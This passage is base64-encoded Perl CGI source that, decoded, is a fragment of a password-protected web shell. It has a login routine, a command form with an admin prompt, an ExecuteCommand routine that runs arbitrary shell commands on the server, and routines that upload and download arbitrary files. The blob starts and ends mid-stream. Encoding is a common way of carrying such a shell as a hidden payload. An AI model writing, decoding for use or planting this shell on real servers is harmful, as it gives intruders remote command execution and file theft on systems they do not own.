CBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ291dAp7CglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkmUHJpbnRMb2dvdXRTY3JlZW47CgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0CiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QKIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIKIyB0byBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9naW4gCnsKCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkCgl7CgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoJCX0KCQkmUHJpbnRMb2dpbkZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBkb3dubG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVEb3dubG9hZEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iZG93bmxvYWQiPgokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVVcGxvYWRGb3JtCnsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KJFByb21wdCB1cGxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPgpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPgpPdmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJ1cGxvYWQiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bwojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMKIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQgZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUKIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRpbWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMKIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRXhlY3V0ZUNvbW1hbmQKewoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZAoJewoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUKCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4KCQkKCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOwoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOwoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPiI7Cgl9CgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+PHhtcD4iOwoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsKCQlpZighJFdpbk5UKQoJCXsKCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsKCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJCX0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkCgkJewoJCQkkfD0xOwoJCQkkQ29tbWFuZCAuPSAiIHwiOwoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQoJCQl7CgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJCXByaW50ICIkX1xuIjsKCQkJfQoJCQkkfD0wOwoJCX0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMKCQl7CgkJCXByaW50IGAkQ29tbWFuZGA7CgkJfQoJCWlmKCEkV2luTlQpCgkJewoJCQlhbGFybSgwKTsKCQl9CgkJcHJpbnQgIjwveG1wPiI7Cgl9CgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcgojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaAojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlCnsKCWxvY2FsKCRGaWxlVXJsKSA9IEBfOwoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzCgl7CgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3NlcgoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7CgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJcHJpbnQgPDxFTkQ7Cjxjb2RlPgpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lgo8L2NvZGU+CkVORAoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7Cgl9CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0Cgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJfQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCSZQcmludEZpbGVVcGxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJJlByaW50UGFnZUhlYWRlcigiYyIpOwoKCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzCglwcmludCAiPGNvZGU+VXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsKCX0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50Cgl7CgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRUYXJnZXROYW1lIikpCgkJewoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsKCQkJcHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307CgkJCWNsb3NlKFVQTE9BREZJTEUpOwoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7CgkJCXByaW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCXByaW50ICJGYWlsZWQ6ICQhPGJyPiI7CgkJfQoJfQoJcHJpbnQgIjwvY29kZT4iOwoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkmUHJpbnRQYWdlRm9vdGVyOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsKIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRG93bmxvYWRGaWxlCnsKCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQoJewoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsKCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJlJlYWR